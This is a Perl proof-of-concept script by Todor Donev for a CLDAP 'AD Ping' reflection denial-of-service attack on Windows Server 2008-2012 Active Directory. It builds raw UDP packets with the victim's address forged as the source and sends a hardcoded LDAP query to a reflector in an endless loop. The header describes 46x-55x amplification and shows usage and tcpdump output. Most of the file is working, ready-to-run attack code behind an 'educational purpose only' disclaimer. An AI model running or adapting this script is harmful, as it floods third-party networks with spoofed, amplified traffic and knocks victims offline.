#!/usr/bin/perl # # MS Windows Server 2008/2008 R2/ 2012/2012 R2/ AD LDAP RootDSE Netlogon # (CLDAP "AD Ping") query reflection DoS PoC # # Copyright 2016 (c) Todor Donev # Varna, Bulgaria # todor.donev@gmail.com # https://www.ethical-hacker.org/ # https://www.facebook.com/ethicalhackerorg # http://pastebin.com/u/hackerscommunity # # MS Windows Server 2016 [NOT TESTED !!!] # # Description: # The attacker sends a simple query to a vulnerable reflector # supporting the Connectionless LDAP service (CLDAP) and using # address spoofing makes it appear to originate from the intended # victim. The CLDAP service responds to the spoofed address, # sending unwanted network traffic to the attackeras intended target. # # Amplification techniques allow bad actors to intensify the size # of their attacks, because the responses generated by the LDAP # servers are much larger than the attackeras queries. In this case, # the LDAP service responses are capable of reaching very high # bandwidth and we have seen an average amplification factor of # 46x and a peak of 55x. # # # Disclaimer: # This or previous program is for Educational purpose ONLY. Do not # use it without permission. The usual disclaimer applies, especially # the fact that Todor Donev is not liable for any damages caused by # direct or indirect use of the information or functionality provided # by these programs. The author or any Internet provider bears NO # responsibility for content or misuse of these programs or any # derivatives thereof. By using these programs you accept the fact # that any damage (dataloss, system crash, system compromise, etc.) # caused by the use of these programs is not Todor Donev's # responsibility. # # Use at your own risk and educational # purpose ONLY! # # See also, UDP-based Amplification Attacks: # https://www.us-cert.gov/ncas/alerts/TA14-017A # # # # perl cldapdrdos.pl 192.168.1.112 192.168.1.146 # [ MS Windows Server 2008/2008 R2/ 2012/2012 R2/ AD LDAP RootDSE Netlogon (CLDAP "AD Ping") query reflection DoS PoC # [ ====== # [ Usg: cldapdrdos.pl # [ Default port: 389 # [ Example: perl cldapdrdos.pl 192.168.30.56 192.168.1.1 # [ ====== # [ Todor Donev # [ Facebook: https://www.facebook.com/ethicalhackerorg # [ Website: https://www.ethical-hacker.org/ # [ Sending CLDAP "AD Ping" packets.. # ^C # # tcpdump -i eth0 -c4 port 389 # tcpdump: verbose output suppressed, use -v or -vv for full protocol decode # listening on eth0, link-type EN10MB (Ethernet), capture size 65535 bytes # 00:00:58.638466 IP attacker.31337 > target.ldap: UDP, length 57 # 00:00:58.639360 IP target.ldap > attacker.31337: UDP, length 2315 ## LOOOL... # 00:00:59.039293 IP attacker.31337 > target.ldap: UDP, length 57 # 00:00:59.041043 IP target.ldap > attacker.31337: UDP, length 2315 ## LOOOL... # 4 packets captured # 6 packets received by filter # 0 packets dropped by kernel # # # use Net::RawIP; print "[ MS Windows Server 2008/2008 R2/ 2012/2012 R2/ AD LDAP RootDSE Netlogon (CLDAP \"AD Ping\") query reflection DoS PoC\n"; print "[ ======\n"; print "[ Usg: $0 \n"; print "[ Default port: 389\n"; print "[ Example: perl $0 192.168.30.56 192.168.1.1\n"; print "[ ======\n"; print "[ Todor Donev\n"; print "[ Facebook: https://www.facebook.com/ethicalhackerorg\n"; print "[ Website: https://www.ethical-hacker.org/\n"; my $cldap = $ARGV[0]; my $target = $ARGV[1]; my $port = $ARGV[2] || '389'; die "[ Error: Port must be between 1 and 65535!\n" if ($port < 1 || $port > 65535); my $query = "\x30\x25\x02\x01\x01\x63\x20\x04\x00\x0a"; $query .= "\x01\x00\x0a\x01\x00\x02\x01\x00\x02\x01"; $query .= "\x00\x01\x01\x00\x87\x0b\x6f\x62\x6a\x65"; $query .= "\x63\x74\x63\x6c\x61\x73\x73\x30\x00\x00"; $query .= "\x00\x30\x84\x00\x00\x00\x0a\x04\x08\x4e"; $query .= "\x65\x74\x6c\x6f\x67\x6f\x6e"; my $sock = new Net::RawIP({ udp => {} }) or die; print "[ Sending CLDAP \"AD Ping\" packets..\n"; while () { select(undef, undef, undef, 0.40); # Sleep 400 milliseconds $sock->set({ ip => { saddr => $target, daddr => $cldap}, udp => { source => 31337, dest => $port, data => $query} }); $sock->send; }